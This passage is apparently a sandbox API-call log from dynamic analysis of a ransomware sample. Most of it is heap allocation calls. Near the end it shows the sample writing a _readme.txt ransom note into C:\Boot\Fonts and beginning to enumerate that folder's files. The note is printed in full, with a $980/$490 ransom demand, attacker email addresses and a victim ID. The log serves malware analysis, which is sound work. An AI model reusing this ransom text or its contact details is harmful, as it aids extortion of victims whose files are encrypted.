(HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.802] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0200.802] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.802] PathFindFileNameW (pszPath="") returned="" [0200.802] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.802] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.802] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.803] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.803] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0200.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.803] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0200.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.804] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.804] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.804] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.805] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, 